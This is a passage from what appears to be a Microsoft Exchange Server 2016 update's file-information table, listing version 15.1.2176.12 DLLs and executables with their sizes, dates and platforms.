\nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2176.12| 281,984| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2176.12| 18,816| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2176.12| 83,848| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2176.12| 15,240| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2176.12| 94,104| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2176.12| 1,840,504| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2176.12| 71,552| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2176.12| 175,488| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2176.12| 45,968| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2176.12| 159,640| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2176.12| 51,064| 04-Apr-2021| 10:27| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2176.12| 45,952| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2176.12| 30,600| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2176.12| 100,248| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2176.12| 13,208| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2176.12| 271,248| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2176.12| 22,424| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2176.12| 33,688| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2176.12| 18,320| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2176.12| 15,232| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2176.12| 27,512| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2176.12| 30,600| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2176.12| 22,408| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2176.12| 66,440| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2176.12| 29,568| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2176.12| 19,864| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2176.12| 20,376| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2176.12| 19,336| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2176.12| 34,200| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2176.12| 103,824| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2176.12| 31,624| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2176.12| 15,744| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2176.12| 20,872| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2176.12| 16,280| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2176.12| 49,032| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2176.12| 44,440| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2176.12| 38,280| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2176.12| 10,375,064| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2176.12| 29,056| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2176.12| 21,384| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2176.12| 24,456| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2176.12| 15,240| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2176.12| 21,888| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2176.12| 89,488| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2176.12| 20,864| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2176.12| 26,504| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2176.12| 21,384| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2176.12| 28,032| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2176.12| 28,568| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2176.12| 36,232| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2176.12| 16,776| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2176.12| 19,864| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2176.12| 15,248| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2176.12| 17,280| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2176.12| 19,848| 04-Apr-2021| 10:25| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2176.12| 57,216| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2176.12| 17,800| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2176.12| 18,840| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2176.12| 16,248| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2176.12| 17,800| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2176.12| 15,232| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2176.12| 15,240| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2176.12| 52,632| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2176.12| 18,304| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2176.12| 34,176| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2176.12| 17,304| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2176.12| 18,824| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2176.12| 43,400| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2176.12| 165,272| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2176.12| 54,656| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2176.12| 9,059,200| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2176.12| 33,160| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2176.12| 124,280| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2176.12| 82,824| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2176.12| 14,232| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2176.12| 30,104| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2176.12| 661,376| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2176.12| 63,376| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2176.12| 175,496| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2176.12| 2,784,136| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2176.12| 53,128| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2176.12| 151,944| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2176.12| 966,024| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2176.12| 185,224| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2176.12| 31,624| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2176.12| 39,824| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2176.12| 105,864| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2176.12| 94,600| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2176.12| 43,384| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2176.12| 18,816| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2176.12| 172,952| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2176.12| 102,792| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2176.12| 98,696| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2176.12| 188,296| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2176.12| 43,400| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2176.12| 447,368| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2176.12| 89,984| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2176.12| 107,896| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2176.12| 371,072| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2176.12| 193,944| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2176.12| 551,824| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2176.12| 16,256| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2176.12| 15,736| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2176.12| 321,424| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2176.12| 17,800| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2176.12| 45,440| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2176.12| 18,304| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2176.12| 12,672| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2176.12| 20,888| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2176.12| 415,104| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2176.12| 1,269,656| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2176.12| 39,320| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2176.12| 433,024| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2176.12| 4,560,280| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2176.12| 261,000| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2176.12| 33,656| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2176.12| 94,104| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2176.12| 591,232| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2176.12| 3,560,832| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2176.12| 67,992| 04-Apr-2021| 10:27| x86 \nMicrosoft.exchange.management.dll| 15.1.2176.12| 16,478,584| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2176.12| 58,744| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2176.12| 23,928| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2176.12| 101,784| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2176.12| 543,608| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2176.12| 305,048| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2176.12| 131,976| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2176.12| 418,680| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2176.12| 275,864| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2176.12| 70,552| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2176.12| 7,873,920| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2176.12| 1,500,568| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2176.12| 145,296| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2176.12| 13,704| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2176.12| 71,544| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2176.12| 1,249,144| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2176.12| 1,876,872| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2176.12| 5,225,856| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2176.12| 36,248| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2176.12| 117,656| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2176.12| 209,784| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2176.12| 79,768| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2176.12| 17,288| 04-Apr-2021| 10:27| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2176.12| 156,024| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2176.12| 65,912| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2176.12| 30,600| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2176.12| 58,248| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2176.12| 29,560| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2176.12| 175,496| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2176.12| 28,552| 04-Apr-2021| 10:27| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2176.12| 75,128| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2176.12| 207,256| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2176.12| 440,728| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2176.12| 83,352| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2176.12| 35,200| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2176.12| 53,112| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2176.12| 96,648| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.migration.dll| 15.1.2176.12| 1,110,408| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2176.12| 14,744| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2176.12| 135,568| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2176.12| 5,155,712| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2176.12| 19,840| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2176.12| 68,504| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.net.dll| 15.1.2176.12| 5,084,048| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2176.12| 265,624| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2176.12| 37,768| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2176.12| 14,208| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2176.12| 549,784| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2176.12| 22,912| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2176.12| 106,376| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2176.12| 291,720| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2176.12| 17,280| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2176.12| 277,896| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.odata.dll| 15.1.2176.12| 2,992,504| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2176.12| 88,984| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2176.12| 101,760| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2176.12| 38,272| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2176.12| 45,432| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2176.12| 58,240| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2176.12| 147,336| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2176.12| 26,488| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2176.12| 184,192| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2176.12| 26,520| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2176.12| 38,296| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2176.12| 55,696| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2176.12| 147,328| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2176.12| 191,880| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2176.12| 33,672| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2176.12| 28,032| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2176.12| 32,648| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2176.12| 15,248| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2176.12| 17,304| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2176.12| 17,304| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2176.12| 106,888| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2176.12| 106,888| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2176.12| 24,960| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2176.12| 24,960| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2176.12| 42,888| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2176.12| 264,064| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2176.12| 264,064| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2176.12| 358,272| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2176.12| 4,168,088| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2176.12| 326,032| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2176.12| 41,344| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2176.12| 30,616| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2176.12| 135,032| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2176.12| 436,624| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2176.12| 14,216| 04-Apr-2021| 10:23| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2176.12| 224,144| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2176.12| 105,864| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.pst.dll| 15.1.2176.12| 168,840| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2176.12| 168,840| 04-Apr-2021| 10:22| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2176.12| 259,456| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2176.12| 72,072| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2176.12| 215,944| 04-Apr-2021| 10:22| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2176.12| 106,880| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2176.12| 425,864| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2176.12| 70,536| 04-Apr-2021| 10:24| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2176.12| 46,456| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2176.12| 206,216| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2176.12| 162,680| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2176.12| 342,400| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2176.12| 149,368| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2176.12| 95,096| 04-Apr-2021| 10:27| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2176.12| 127,376| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2176.12| 63,384| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2176.12| 36,736| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2176.12| 17,808| 04-Apr-2021| 10:27| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2176.12| 9,666,944| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2176.12| 20,788,120| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2176.12| 36,760| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2176.12| 97,688| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2176.12| 28,568| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2176.12| 72,072| 04-Apr-2021| 10:26| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2176.12| 15,760| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2176.12| 13,192| 04-Apr-2021| 10:24| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2176.12| 59,280| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2176.12| 1,639,312| 04-Apr-2021| 10:21| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2176.12| 209,808| 04-Apr-2021| 10:23| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2176.12| 60,280| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2176.12| 517,520| 04-Apr-2021| 10:26| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2176.12| 161,144| 04-Apr-2021| 10:22| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2176.12| 721,816| 04-Apr-2021| 10:21| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2176.12| 243,096| 04-Apr-2021| 